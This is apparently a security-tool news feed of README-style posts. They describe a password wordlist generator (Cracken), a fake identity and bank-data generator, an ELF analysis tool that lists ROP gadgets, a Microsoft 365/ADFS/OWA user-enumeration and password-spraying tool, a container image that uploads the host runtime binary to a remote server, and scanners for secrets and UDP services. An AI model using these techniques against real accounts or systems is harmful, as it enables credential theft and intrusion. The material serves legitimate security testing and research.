cracken -c 01 '?l?l?l?l20?1?d'

# starts with firstname from wordlist followed by 4 digits
cracken -w firstnames.txt '?w1?d?d?d?d'

# starts with firstname from wordlist with lastname from wordlist ending with symbol
cracken -w firstnames.txt -w lastnames.txt -c '[email protected]#$' '?w1?w2?1'

# repeating wordlists multiple times and combining charsets
cracken -w verbs.txt -w nouns.txt '?w1?w2?w1?w2?w2?d?d?d'


## Create Smartlists Subcommand Examples:

# create smartlist from single file into smart.txt
cracken create -f rockyou.txt --smartlist smart.txt

# create smartlist from multiple files with multiple tokenization algorithms
cracken create -t bpe -t unigram -t wordpiece -f rockyou.txt -f passwords.txt -f wikipedia.txt --smartlist smart.txt

# create smartlist with minimum subword length of 3 and max numbers-only subwords of size 6
cracken create -f rockyou.txt --min-word-len 3 --numbers-max-size 6 --smartlist smart.txt


## Entropy Subcommand Examples:

# estimating entropy of a password
cracken entropy --smartlist vocab.txt 'helloworld123!'

# estimating entropy of a passwords file with a charset mask entropy (default is hybrid)
cracken entropy --smartlist vocab.txt -t charset -p passwords.txt

# estimating the entropy of a passwords file
cracken entropy --smartlist vocab.txt -p passwords.txt

cracken-v1.0.0 linux-x86_64 compiler: rustc 1.56.1 (59eed8a2a 2021-11-01)
more info at: https://github.com/shmuelamar/cracken

Generate Subcommand Usage Info

$ cracken generate --help
cracken-generate
(default) - Generates newline separated words according to given mask and wordlist files

USAGE:
cracken generate [FLAGS] [OPTIONS] <mask> --masks-file <masks-file>

FLAGS:
-h, --help
Prints help information

-s, --stats
prints the number of words this command will generate and exits

-V, --version
Prints version information


OPTIONS:
-c, --custom-charset <custom-charset>...
custom charset (string of chars). up to 9 custom charsets - ?1 to ?9. use ?1 on the mask for the first charset

-i, --masks-file <masks-file>
a file containing masks to generate

-x, --maxlen <max-length>
maximum length of the mask to start from

-m, --minlen & lt;min-length>
minimum length of the mask to start from

-o, --output-file <output-file>
output file to write the wordlist to, defaults to stdout

-w, --wordlist <wordlist>...
filename containing newline (0xA) separated words. note: currently all wordlists loaded to memory


ARGS:
<mask>
the wordlist mask to generate.
available masks are:
builtin charsets:
?d - digits: "0123456789"
?l - lowercase: "abcdefghijklmnopqrstuvwxyz"
?u - uppercase: "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
?s - symbols: " !\"\#$%&'()*+,-./:;<=>[email protected][\\]^_`{|}~"
?a - all characters: ?d + ?l + ?u + ?s
?b - all binary values: (0-255)

custom charset s ?1 to ?9:
?1 - first custom charset specified by --charset 'mychars'

wordlists ?w1 to ?w9:
?w1 - first wordlist specified by --wordlist 'my-wordlist.txt'

Create Smartlist Subcommand Usage Info

$ cracken create --help  
cracken-create
Create a new smartlist from input file(s)

USAGE:
cracken create [FLAGS] [OPTIONS] --file <file>... --smartlist <smartlist>

FLAGS:
-h, --help Prints help information
-q, --quiet disables printing progress bar
-V, --version Prints version information

OPTIONS:
-f, --file <file>... input filename, can be specified multiple times for multiple files
--min-frequency <min_frequency> minimum frequency of a word, relevant only for BPE tokenizer
-l, --min-word-len <min_word_len> filters words shorter than the specified length
--numbers-max-size <numbers_max_size> filters numbers (all digits) longer than the specified size
-o, --smartlist <smartlist> output smartlist filename
-t, --tokenizer <tokeniz er>... tokenizer to use, can be specified multiple times.
one of: bpe,unigram,wordpiece [default: bpe] [possible values: bpe, unigram, wordpiece]
-m, --vocab-max-size <vocab_max_size> max vocabulary size

Entropy Subcommand Usage Info

$ cracken entropy --help
cracken-entropy

Computes the estimated entropy of password or password file.
The entropy of a password is the log2(len(keyspace)) of the password.

There are two types of keyspace size estimations:
* mask - keyspace of each char (digit=10, lowercase=26...).
* hybrid - finding minimal split into subwords and charsets.


USAGE:
cracken entropy [FLAGS] [OPTIONS] <password> --smartlist <smartlist>...

FLAGS:
-h, --help Prints help information
-s, --summary output summary of entropy for password
-V, --version Prints version information

OPTIONS:
-t, --mask-type <mask_type> type of mask to output, one of: charsets(charsets only), hybrid(charsets+wordlists) [possible values: hybrid, charset]
-p, --passwords-file <passwords-file> newline separated password file to estimate entropy for
-f, --smartlist <smartlist>... smartlist input file to estimate entropy with, a newline separated text file

ARGS:
<password> password to

License

Cracken is licensed under MIT. THIS PROJECT MUST BE USED FOR LEGAL PURPOSES ONLY


Contributing

Cracken is under active development, if you wish to help below is this the partial roadmap for this project. Feel free to submit PRs and open issues.



FakeDataGen - Full Valid Fake Data Generator

27 November 2021 at 11:30
By: Zion3R


FakeDataGen is a Full Valid Fake Data Generator.

This tool helps you to create fake accounts (in Spanish format) with fully valid data. Within this information, you can find the most common names, emails, bank details and other useful information.


Requirements

  • Python 3
  • Install requirements.txt

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/FakeDataGen

Usage

./FakeDataGen.py -h

_____ _ ____ _ ____
| ___|_ _| | _ ___| _ \ __ _| |_ __ _ / ___| ___ _ __
| |_ / _` | |/ / _ \ | | |/ _` | __/ _` | | _ / _ \ '_ \
| _| (_| | < __/ |_| | (_| | || (_| | |_| | __/ | | |
|_| \__,_|_|\_\___|____/ \__,_|\__\__,_|\____|\___|_| |_|

-------------------- by @JoelGMSec ---------------------

usage: FakeDataGen.py [-h] [-n NUMBER] [-b] [-e] [-f FILE] [-z] [-p PASSWORD]

optional arguments:
-h, --help show this help message and exit
-n NUMBER, --number NUMBER
The number of records should be created
-b, --bankdata Show only bank data (Card, CVV, IBAN..)
-e, --extended Show only extended info (City, Phone, SS..)
-f FILE, --file FILE File path to save data
-z, --zip Compress data to zip file
-p PASSWORD, --password PASSWORD
Password to protect zip file

The detailed guide of use can be found at the following link:

https://darkbyte.net/generando-datos-falsos-con-fakedatagen

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This script has been created and designed from scratch by Joel GΓ‘mez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



ELFXtract - An Automated Analysis Tool Used For Enumerating ELF Binaries

26 November 2021 at 20:30
By: Zion3R


ELFXtract is an automated analysis tool used for enumerating ELF binaries

Powered by Radare2 and r2ghidra

This is specially developed for PWN challenges and it has many automated features

It almost displays every details of the ELF and also decompiles its ASM to C code using r2ghidra

Decompiling ELFs in Ghidra takes more time, but in elfxtract it decompiles and displays in few seconds


Features in ELFXtract

  1. File info
  2. Shared object dependency details
  3. ELF Security Mitigation details / Checksec
  4. String details
  5. Header memory map
  6. ROP gadgets
  7. PLT Table
  8. GOT Table
  9. Function Table
  10. ASM code of functions
  11. Decompiled code of functions
  12. Predicting possible vulnerable functions

Installation

git clone https://github.com/AidenPearce369/elfxtract
cd elfxtract
chmod +x install.sh
./install.sh
pip install -r requirements.txt

Working

You can run elfxtract with any ELF along with -a to list all details from the ELF

Decompiler type: undefined8 main(void) { undefined8 s; sym.imp.puts("Enter your name"); sym.imp.gets(&s); sym.imp.printf("Your name is "); sym.imp.puts(&s); return 0; } *************************************************************************** > VULNERABLE FUNCTIONS : Possible vulnerability locations - Command Execution 0x000011ce e8bdfeffff call sym.imp.system ; int system(const char *string) Possible vulnerability locations - Format String 0x000011bd e8defeffff call sym.imp.printf ; int printf(const char *format) 0x0000120b e890feffff call sym.imp.printf ; int printf(const char *format) Possible vulnerability locations - Buffer Overflow 0x000011fa e8b1feffff call sym.imp.gets ; char *gets(char *s) *************************************************************************** ">
[email protected]:~/elfxtract$ python3 main.py --file programvuln -a

_____ _ ________ ___ _
| ___| | | ___\ \ / / | | |
| |__ | | | |_ \ V /| |_ _ __ __ _ ___| |_
| __|| | | _| / \| __| '__/ _` |/ __| __|
| |___| |____| | / /^\ \ |_| | | (_| | (__| |_
\____/\_____/\_| \/ \/\__|_| \__,_|\___|\__|

@aidenpearce369

***************************************************************************

> FILE INFO :

ELF Name : programvuln
ELF Type : ELF 64-bit LSB shared object
ELF Arch : x86-64
ELF SHA1 Hash : BuildID[sha1]=cf149d97ad1e895561080b1f5c317bc5bc1e8652

This binary is dynamically linked & not stripped

********************** *****************************************************

> SHARED OBJECT DEPENDENCY :

linux-vdso.so.1 (0x00007ffd525a4000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fd610d93000)
/lib64/ld-linux-x86-64.so.2 (0x00007fd610fa1000)

***************************************************************************

> ELF SECURITY MITIGATIONS :

RELRO : Full RELRO
STACK CANARY : No Canary found
NX BIT : NX disabled
PIE : PIE enabled
RPATH : No RPATH
RUNPATH : No RUNPATH

***************************************************************************

> POSSIBLE STRINGS :

nth paddr vaddr len size section type string
―――――――――――――――――――――――& #8213;―――――――――――――――――――――――――――――――
0 0x00002008 0x00002008 31 32 .rodata ascii You have bypassed this function
1 0x00002028 0x00002028 12 13 .rodata ascii cat flag.txt
2 0x00002035 0x00002035 15 16 .rodata ascii Enter your name
3 0x00002045 0x00002045 13 14 .rodata ascii Your name is

***************************************************************************

> RODATA HEXDUMP :

0x00002000 01000200 00000000 596f7520 68617665 ........You have
0x00002010 20627970 61737365 64207468 69732066 bypassed this f
0x00002020 756e6374 696f6e00 63617420 666c6167 unction.cat flag
0x00002030 2e747874 00456e74 65722079 6f757220 .txt.Enter your
0x00002040 6e616d65 00596f75 72206e61 6d652069 name.Your name i
0x00002050 732000 s .


***************************************************************************

> ELF ENTRY POINT :

The entry point of the ELF is at 0x10c0

***************************************************************************

> HEADER MEMORY MAP :

Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040
0x00000000000002d8 0x00000000000002d8 R 0x8
INTERP 0x0000000000000318 0x0000000000000318 0x0000000000000318
0x000000000000001c 0x000000000000001c R 0x1
[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x00000000000006a8 0x00000000000006a8 R 0x1000
LOAD 0x0000000000001000 0x0000000000001000 0x0000000000001000
0x00000000000002b5 0x00000000000002b5 R E 0x1000
LOAD 0x0000000000002000 0x0000000000002000 0x0000000000002000
0x00000000000001c8 0x00000000000001c8 R 0x1000
LOAD 0x0000000000002da0 0x0000000000003da0 0x0000000000003da0
0x0000000000000270 0x0000000000000278 RW 0x1000
DYNAMIC 0x0000000000002db0 0x0000000000003db0 0x0000000000003db0
0x00000000000001f0 0x00000000000001f0 RW 0x8
NOTE 0x0000000000000338 0x0000000000000338 0x0000000000000338
0x0000000000000020 0x0000000000000020 R 0x8
NOTE 0x0000000000000358 0x0000000000000358 0x0000000000000358
0x0000000000000044 0x0000000000000044 R 0x4
GNU_PROPERTY 0x000000000 0000338 0x0000000000000338 0x0000000000000338
0x0000000000000020 0x0000000000000020 R 0x8
GNU_EH_FRAME 0x0000000000002054 0x0000000000002054 0x0000000000002054
0x000000000000004c 0x000000000000004c R 0x4
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RWE 0x10
GNU_RELRO 0x0000000000002da0 0x0000000000003da0 0x0000000000003da0
0x0000000000000260 0x0000000000000260 R 0x1

***************************************************************************
[*] Loaded 14 cached gadgets for 'programvuln'

> ROP GADGETS :

0x1017 : add esp, 8;ret
0x1016 : add rsp, 8;ret
0x1221 : leave;ret
0x128c : pop r12;pop r13;pop r14;pop r15;ret
0x128e : pop r13;pop r14;pop r15;ret
0x1290 : pop r14;pop r15;ret
0x12 92 : pop r15;ret
0x128b : pop rbp;pop r12;pop r13;pop r14;pop r15;ret
0x128f : pop rbp;pop r14;pop r15;ret
0x1193 : pop rbp;ret
0x1293 : pop rdi;ret
0x1291 : pop rsi;pop r15;ret
0x128d : pop rsp;pop r13;pop r14;pop r15;ret
0x101a : ret

***************************************************************************

> PLT TABLE :

__cxa_finalize : 0x1074
puts : 0x1084
system : 0x1094
printf : 0x10a4
gets : 0x10b4

***************************************************************************

> GOT TABLE :

_ITM_deregisterTMCloneTable : 0x3fd8
__libc_start_main : 0x3fe0
__gmon_start__ : 0x3fe8
_ITM_registerTMCloneTable : 0x3ff0
__cxa_finalize : 0x3ff8
puts : 0x3fb8
system : 0x3fc0
printf : 0x3fc8
gets : 0x3fd0

***************************************************************************

> FUNCTION TABLE :

__libc_csu_fini : 0x12a0
__libc_csu_init : 0x1230
win : 0x11a9
_start : 0x10c0
main : 0x11d6

***************************************************************************

> POSSIBLE USER DEFINED FUNCTIONS :

win : 0x11a9
main : 0x11d6

***************************************************************************

> ASSEMBLY AND DECOMPILED CODE :


[*] ASM - win :

β”Œ 45: sym.win ();
β”‚ 0x000011a9 f30f1efa endbr64
β”‚ 0x000011ad 55 push rbp
β”‚ 0x000011ae 4889e5 mov rbp, rsp
β”‚ 0x000011b1 488d3d500e00. lea rdi, str.You_have_bypassed_this_function ; 0x2008 ; "You have bypassed this function" ; const char *format
β”‚ 0x000011b8 b800000000 mov eax, 0
β”‚ 0x000011bd e8defeffff call sym.imp.printf ; int printf(const char *format)
β”‚ 0x000011c2 488d3d5f0e00. lea rdi, str.cat_flag.txt ; 0x2028 ; "cat flag.txt" ; const char *string
β”‚ 0x000011c9 b800000000 mov eax, 0
β”‚ 0x000011ce e8bdfeffff call sym.imp.system ; int system(const char *string)
β”‚ 0x000011d3 90 nop
β”‚ 0x000011d4 5d pop rbp
β”” 0x000011d5 c3 ret

[*] DECOMPILED CODE - win :

void sym.win(void)

{
sym.imp.printf("You have bypassed this function");
sym.imp.system("cat flag.txt");
return;
}

[*] ASM - main :

; DATA XREF from entry0 @ 0x10e1
β”Œ 77: int main (int argc, char **argv, char **envp);
β”‚ ; var char *s @ rbp-0x40
β”‚ 0x000011d6 f30f1efa endbr64
β”‚ 0x000011da 55 push rbp
β”‚ 0x000011db 4889e5 mov rbp, rsp
β”‚ 0x000011de 4883ec40 sub rsp, 0x40
β”‚ 0x000011e2 488d3d4c0e00. lea rdi, str.Enter_your_name ; 0x2035 ; "Enter your name" ; const char *s
β”‚ 0x000011e9 e892feffff call sym.imp.puts ; int puts(const char *s)
β”‚ 0x000011ee 488d45c0 lea rax, [s]
β”‚ 0x000011f2 4889c7 mov rdi, rax ; char *s
β”‚ 0x000011f5 b800000000 mov eax, 0
β”‚ 0x000011fa e8b1feffff call sym.imp.gets ; char *gets(char *s)
β”‚ 0x000011ff 488d3d3f0e00. lea rdi, str.Your_name_is_ ; 0x2045 ; "Your name is " ; const char *format
β”‚ 0x00001206 b800000000 mov eax, 0
β”‚ 0x0000120b e890feffff call sym.imp.printf ; int printf(const char *format)
β”‚ 0x00001210 488d45c0 lea rax, [s]
β”‚ 0x00001214 4889c7 mov rdi, rax ; const char *s
β”‚ 0x00001217 e864feffff call sym.imp.puts ; int puts(const char *s)
β”‚ 0x 0000121c b800000000 mov eax, 0
β”‚ 0x00001221 c9 leave
β”” 0x00001222 c3 ret

[*] DECOMPILED CODE - main :

// WARNING: [r2ghidra] Failed to match type char * for variable s to Decompiler type:

undefined8 main(void)

{
undefined8 s;

sym.imp.puts("Enter your name");
sym.imp.gets(&s);
sym.imp.printf("Your name is ");
sym.imp.puts(&s);
return 0;
}

***************************************************************************

> VULNERABLE FUNCTIONS :

Possible vulnerability locations - Command Execution

0x000011ce e8bdfeffff call sym.imp.system ; int system(const char *string)

Possible vulnerability locations - Format String

0x000011bd e8defeffff call sym.imp.printf ; int printf(const char * format)
0x0000120b e890feffff call sym.imp.printf ; int printf(const char *format)

Possible vulnerability locations - Buffer Overflow

0x000011fa e8b1feffff call sym.imp.gets ; char *gets(char *s)


***************************************************************************

You can also pass arguments and get the info based on your needs,

[email protected]:~/elfxtract$ python3 main.py -h

_____ _ ________ ___ _
| ___| | | ___\ \ / / | | |
| |__ | | | |_ \ V /| |_ _ __ __ _ ___| |_
| __|| | | _| / \| __| '__/ _` |/ __| __|
| |___| |____| | / /^\ \ |_| | | (_| | (__| |_
\____/\_____/\_| \/ \/\__|_| \__,_|\___|\__|

@aidenpearce369

***************************************************************************
usage: main.py [-h] -f FILE [-a] [-i] [-g] [--user-func] [--get-func GET_FUNC] [--asm-only]
[--decompiled-only] [-t]

optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE Path of the ELF
-a, --all Extract all info
-i, --info Displays bas ic info
-g, --gadgets Displays gadgets
--user-func Displays the details of user defined functions
--get-func GET_FUNC Displays the ASM & decompiled code of the given function
--asm-only Displays the ASM of ELF
--decompiled-only Displays the decompiled C code of ELF
-t, --tables Displays PLT, GOT & Function table

Updates

elfxtract is fully developed for parsing PWN binaries,

Soon, it will be added with new features to analyse system binaries

And also, auto-BOF and auto-ret2 exploit features will be added



goEnumBruteSpray - User Enumeration And Password Bruteforce On Azure, ADFS, OWA, O365 And Gather Emails On Linkedin

26 November 2021 at 11:30
By: Zion3R


The recommended module is o365 for user enumeration and passwords bruteforce / spray . Additional information can be retrieved to avoid account lockout, to know that the password is good but expired, MFA enabled,...


Linkedin

This module should be used to retrieve a list of email addresses before validating them through a user enumeration module. The company will be searched on Linkedin and all people working at these companies will be returned in the specified format.

The Linkedin's session cookie li_at is required.


SearchEngine

This module should be used to retrieve a list of email addresses before validating them through a user enumeration module. The company name will be searched on Google and Bing with a dork to find people working in the company (site:linkedin.com/in+"%s"). The results title will be parsed to output email addresses in the specified format.



Azure

User enumeration

The Azure module is only available to enumerate the users of a tenant. The authentication request will be made on https://autologon.microsoftazuread-sso.com, a detailed response shows if the account does not exist, a MFA is required, if the account is locked, ...



ADFS

Passwords bruteforce / spray

The ADFS module is only available to bruteforce or spray a password. The authentication request is sent to https://<target>/adfs/ls/idpinitiatedsignon.aspx?client-request-id=<randomGUID>&pullStatus=0. An error message can informs the user if the password is expired


Β 

O365

This module allows to enumerate users and bruteforce / spray passwords.

User enumeration

Several modes are available: office, oauth2 and onedrive (not implemented yet). The office mode is recommended as no authentication is made. Oauth2 can retrieve additional information through AADSTS error code (MFA enable, locked account, disabled account)



Passwords bruteforce / spray

As for the user enumeration, two modes are available: oauth2 and autodiscover (not implemented yet). The Oauth2 is the recommended mode, it allows to get much information thanks to the AADSTS error code.



OWA

This module allows to enumerate users and bruteforce / spray passwords.

User enumeration

Enumeration is made with authentication requests. Authentication for a non-existent user will take longer than for a valid user. At first, the average response time for an invalid user will be calculated and then the response time for each authentication request will be compared.



Passwords bruteforce / spray

Please note that no account locking mechanism can be implemented because no information about it is returned.



Credits

https://github.com/busterb/msmailprobehttps://github.com/0xZDH/o365spray/https://github.com/xFreed0m/ADFSpray/https://github.com/m8r0wn/CrossLinked



Nanobrok - Web Service For Control And Protect Your Android Device Remotely

25 November 2021 at 20:30
By: Zion3R


Web Service write in Python for control and protect your android device remotely.Β 

The official app can be found on the PlayStore:


Overview

Nanobrok-Server is powerful opensource webservice for control and protect your android device, written in Python, that allow and offer a stable and security connection with your android device for protect , control remotely.

Main Features

  • Maps the location of your device
  • Alert flag (Event it's lost or stolen)
  • Recorder Audio Mic
  • Remote File Transfer [PRO]
  • Network scanner [PRO]
  • and more!

Security features

We implemented some security features for try protect your remote server. But remember that no method of transmission over the internet, or method of electronic storage is 100% secure and reliable, and I cannot guarantee its absolute security.

  • CSRF token
  • Sign-in attempt block limit
  • X-Frame-Options
  • Same origin policy (SOP)
  • CORS flask implementation
  • HTTPS force redirect
  • API Header X-CSRFToken
  • Self Signed Certificate (CA)

we are always looking to implement security features.

Supported platforms

  • Python: you need Python 3.7 or later to run Nanobrok-Server.

  • You can run localhost, VPS or as heroku app.

  • Operating System:

    • a recent version of Linux (we tested on Ubuntu 18.04 LTS);
    • please note: Windows is supported (was not tested yet)

Installation & Documentation

Learn more about using wiki

Contributing

See CONTRIBUTING.md for how to help out.

community

on discord: https://discord.gg/gYjBryBu

License

Nanobrok is licensed under the Apche 2.0.

Made with by P0cL4bs Team


LOLBins - PyQT5 App For LOLBAS And GTFOBins

25 November 2021 at 11:30
By: Zion3R


PyQT app to list all Living Off The Land Binaries and Scripts for Windows from LOLBAS and Unix binaries that can be used to bypass local security restrictions in misconfigured systems from GTFOBins.

Widnows


Linux



Redherd Framework -A Collaborative And Serverless Framework For Orchestrating A Geographically Distributed Group Of Assets

24 November 2021 at 20:30
By: Zion3R


RedHerd is a collaborative and serverless framework for orchestrating a geographically distributed group of assets capable of conducting simulating complex offensive cyberspace operations.

Getting Started

Take a look at the RedHerd documentation for instructions on how to getting started with the framework.

Cite this work

If you use RedHerd Framework for your research activity, cite the following paper published by MDPI (Multidisciplinary Digital Publishing Institute) https://www.mdpi.com/2624-6120/2/4/38

Links

Hereafter, some interesting links referred to the project:

Changelog

Go to CHANGELOG to see all the version changes.

License

This project is under the MIT license.

Contact us

Feel free to contact us at this e-mail address:


Disclaimer

The provided contents and tools are for awareness and research purposes only. Our target audience is composed of those interested in learning about Ethical Hacking, Security, Penetration Testing and Red Teaming. We are not responsible for any inappropriate or illegal usage of both proposed material and discussed topics.

Funding

This is a non-profit project which received neither funding nor sponsorship.



Whoc - A Container Image That Extracts The Underlying Container Runtime

24 November 2021 at 11:30
By: Zion3R


A container image that extracts the underlying container runtime and sends it to a remote server. Poke at the underlying container runtime of your favorite CSP container platform!


How does it work?

As shown by runc CVE-2019-5736, traditional Linux container runtimes expose themselves to the containers they're running through /proc/self/exe. whoc uses this link to read the container runtime executing it.


Dynamic Mode

This is whoc default mode that works against dynamically linked container runtimes.

  1. The whoc image entrypoint is set to /proc/self/exe, and the image's dynamic linker (ld.so) is replaced with fake_ld.
  2. Once the image is run, the container runtime re-executes itself inside the container.
  3. Given the runtime is dynamically linked, the kernel loads our fake dynamic linker to the runtime process and passes execution to it.
  4. fake_ld obtains a file descriptor for the runtime binary by opening /proc/self/exe, and executes upload_runtime.
  5. upload_runtime reads the runtime binary from /proc/self/fd/<runtime-fd> and sends it to the configured remote server.



Wait-For-Exec Mode

For statically linked container runtimes, whoc comes in another flavor: whoc:waitforexec.

  1. upload_runtime is the image entrypoint, and runs as the whoc container PID 1.
  2. The user is expected to exec into the whoc container and invoke a file pointing to /proc/self/exe (e.g. docker exec whoc-ctr /proc/self/exe)
  3. Once the exec occurs, the container runtime re-executes itself inside the container
  4. upload_runtime reads the runtime binary through /proc/<runtime-pid>/exe and sends it to the configured remote server



Try Locally

You'll need docker and python3 installed. Clone the repository:

$ git clone [email protected]:twistlock/whoc.git

Set up a file server to receive the extracted container runtime:

$ cd whoc
$ mkdir -p stash && cd stash
$ ln -s ../util/fileserver.py fileserver
$ ./fileserver

From another shell, run the whoc image in your container environment of choice, for example Docker:

$ cd whoc
$ docker build -f Dockerfile_dynamic -t whoc:latest src # or ./util/build.sh
$ docker run --rm -it --net=host whoc:latest 127.0.0.1 # or ./util/run_local.sh

See that the file server received the container runtime. Since we run whoc under vanilla Docker, the received container runtime should be runc.

--net=host is only used in local tests so that the whoc container could easily reach the fileserver on the host via 127.0.0.1.


Help

Help for whoc's main binary, upload_runtime:

Usage: upload_runtime [options] <server_ip>

Options:
-p, --port Port of remote server, defaults to 8080
-e, --exec Wait-for-exec mode for static container runtimes, waits until an exec to the container occurred
-b, --exec-bin In exec mode, overrides the default binary created for the exec, default is /bin/enter
-a, --exec-extra-argument In exec mode, pass an additional argument to the runtime so it won't exit quickly
-r, --exec-readdir-proc In exec mode, instead of guessing the runtime pid (which gives whoc one shot of catching the runtime),
find the runtime by searching for new processes under '/proc'


Whispers - Identify Hardcoded Secrets In Static Structured Text

23 November 2021 at 20:30
By: Zion3R


"My little birds are everywhere, even in the North, they whisper to me the strangest stories." - Lord Varys

Whispers is a static code analysis tool designed for parsing various common data formats in search of hardcoded credentials and dangerous functions. Whispers can run in the CLI or you can integrate it in your CI/CD pipeline.


Detects
  • Passwords
  • API tokens
  • AWS keys
  • Private keys
  • Hashed credentials
  • Authentication tokens
  • Dangerous functions
  • Sensitive files

Supported Formats

Whispers is intended to be a structured text parser, not a code parser.

The following commonly used formats are currently supported:

  • YAML
  • JSON
  • XML
  • .npmrc
  • .pypirc
  • .htpasswd
  • .properties
  • pip.conf
  • conf / ini
  • Dockerfile
  • Dockercfg
  • Shell scripts
  • Python3

Python3 files are parsed as ASTs because of native language support.


Declaration & Assignment Formats

The following language files are parsed as text, and checked for common variable declaration and assignment patterns:

  • JavaScript
  • Java
  • Go
  • PHP

Special Formats
  • AWS credentials files
  • JDBC connection strings
  • Jenkins config files
  • SpringFramework Beans config files
  • Java Properties files
  • Dockercfg private registry auth files
  • Github tokens

Installation

From PyPI
pip3 install whispers

From GitHub
git clone https://github.com/Skyscanner/whispers
cd whispers
make install

Usage

CLI
whispers --help
whispers --info
whispers source/code/fileOrDir
whispers --config config.yml source/code/fileOrDir
whispers --output /tmp/secrets.yml source/code/fileOrDir
whispers --rules aws-id,aws-secret source/code/fileOrDir
whispers --severity BLOCKER,CRITICAL source/code/fileOrDir
whispers --exitcode 7 source/code/fileOrDir

Python
from whispers.cli import parse_args
from whispers.core import run

src = "tests/fixtures"
configfile = "whispers/config.yml"
args = parse_args(["-c", configfile, src])
for secret in run(args):
print(secret)

Config

There are several configuration options available in Whispers. It’s possible to include/exclude results based on file path, key, or value. File path specifications are interpreted as globs. Keys and values accept regular expressions and several other parameters. There is a default configuration file built-in that will be used if you don't provide a custom one.

config.yml should have the following structure:

include:
files:
- "**/*.yml"

exclude:
files:
- "**/test/**/*"
- "**/tests/**/*"
keys:
- ^foo
values:
- bar$

rules:
starks:
message: Whispers from the North
severity: CRITICAL
value:
regex: (Aria|Ned) Stark
ignorecase: True

The fastest way to tweak detection (ie: remove false positives and unwanted results) is to copy the default config.yml into a new file, adapt it, and pass it as an argument to Whispers.

whispers --config config.yml --rules starks src/file/or/dir


Custom Rules

Rules specify the actual things that should be pulled out from key-value pairs. There are several common ones that come built-in, such as AWS keys and passwords, but the tool is made to be easily expandable with new rules.

  • Custom rules can be defined in the main config file under rules:
  • Custom rules can be added to whispers/rules
rule-id:  # unique rule name
description: Values formatted like AWS Session Token
message: AWS Session Token # report will show this message
severity: BLOCKER # one of BLOCKER, CRITICAL, MAJOR, MINOR, INFO

key: # specify key format
regex: (aws.?session.?token)?
ignorecase: True # case-insensitive matching

value: # specify value format
regex: ^(?=.*[a-z])(?=.*[A-Z])[A-Za-z0-9\+\/]{270,450}$
ignorecase: False # case-sensitive matching
minlen: 270 # value is at least this long
isBase64: True # value is base64-encoded
isAscii: False # value is binary data when decoded
isUri: False # value is not formatted like a URI

similar: 0.35 # maximum allowed similarity between key and value
# (1.0 being exactly the same)

Plugins

All parsing functionality is implemented via plugins. Each plugin implements a class with the pairs() method that runs through files and returns the key-value pairs to be checked with rules.

class PluginName:
def pairs(self, file):
yield "key", "value"


UDP-Hunter - Network Assessment Tool For Various UDP Services Covering Both IPv4 And IPv6 Protocols

23 November 2021 at 11:30
By: Zion3R


UDP Scanning has always been a slow and painful exercise, and if you add IPv6 on top of UDP, the tool choices get pretty limited. UDP Hunter is a python based open source network assessment tool focused on UDP Service Scanning. With UDP Hunter, we have focused on providing auditing of widely known UDP protocols for IPv6 and IPv4 hosts. As of today, UDP Hunter supports 19 different service probes. The tool allows you to do bulk scanning of large networks as well as targeted host scanning for specific ports and more. Once an open service is discovered, UDP Hunter takes it one step further and even provides you guidance on how you can possibly exploit the discovered services. UDP Hunter provides reports in a neat text format, however, support for more formats is under way.


How does UDP Hunter work?

UDP Hunter creates a list of IPs when any IP range is provided to it. It also supports domain names which will be resolved and the IP will be added to the list. Once the list has been created internally by UDP Hunter, it will send UDP probes to all listed IPs. If the host is running a UDP service, it will respond. UDP Hunter basically sniffs network particularly for UDP traffic, then reads all UDP packets coming to the target host. All UDP probes received after running UDP Hunter will be reported. However, there is an option (by setting --noise=false) to ignore irrelevant UDP packets and only observe the UDP traffic of interest originated from the hosts and services/ports which are mentioned in the target list. The idea behind creating UDP Hunter was initially inspired by udp-proto-scanner. I heartily thank Portcullis Labs for it and also Anant and Sumit Siddharth(Sid) for their valuable inputs while working on UDP Hunter.


Supported UDP Probes:

As of today, we support the following UDP service probes on their default ports:

  • ike - 500 port
  • rpc / RPCCheck - 111 port
  • ntp / NTPRequest - 123 port
  • snmp-public / SNMPv3GetRequest - 161 port
  • ms-sql / ms-sql-slam - 1434 port
  • netop - 6502 port
  • tftp - 69 port
  • db2 - 523 port
  • citrix - 1604 port
  • echo - 7 port
  • chargen - 19 port
  • systat - 11 port
  • daytime / time - 13 port
  • DNSStatusRequest / DNSVersionBindReq - 53 port
  • NBTStat - 137 port
  • xdmcp - 177 port
  • net-support - 5405 port
  • mdns-zeroconf - 5353 port
  • gtpv1 - 2123 port

Setup:

Download the tool from here or Clone the repository:

git clone https://github.com/NotSoSecure/udp-hunter


Requirements:
  • Python 3.x
  • Python Modules - also mentioned in β€œrequirements.txt” file
    • netaddr
    • colorama
    • argparse
    • ifaddr
    • datetime

This should help you with the initial setup:

Install all required modules: pip3 install -r requirements.txt


Configuration files required:
  • udp.txt - This file contains UDP probes
  • udphelp.txt - This file contains list of tools, suggestions for each UDP probes or services

You can also change configuration files by using command line argument:

β€œ--configfile ” and β€œ--probehelp ”


Verify the configurations by running following command:

python udp-hunter.py

Note: It should display following help details, if this throws any error check your configurations or connect with me for any tool specific errors.


Features / Options:

UDP Hunter v0.1beta has the following features:

Mandatory Options:
  • --host - Single Host - Required or
  • --file - File of ips - Required

Optional:
  • --output - Output file - Required
  • --probes - Name of probe or 'all' (default: all probes) (Optional)
    • Probe list - ike, rpc, ntp, snmp-public, ms-sql, ms-sql-slam, netop, tftp, db2, citrix, echo, chargen, systat, daytime, time, RPCCheck, DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, SNMPv3GetRequest, xdmcp, net-support, mdns-zeroconf, gtpv1
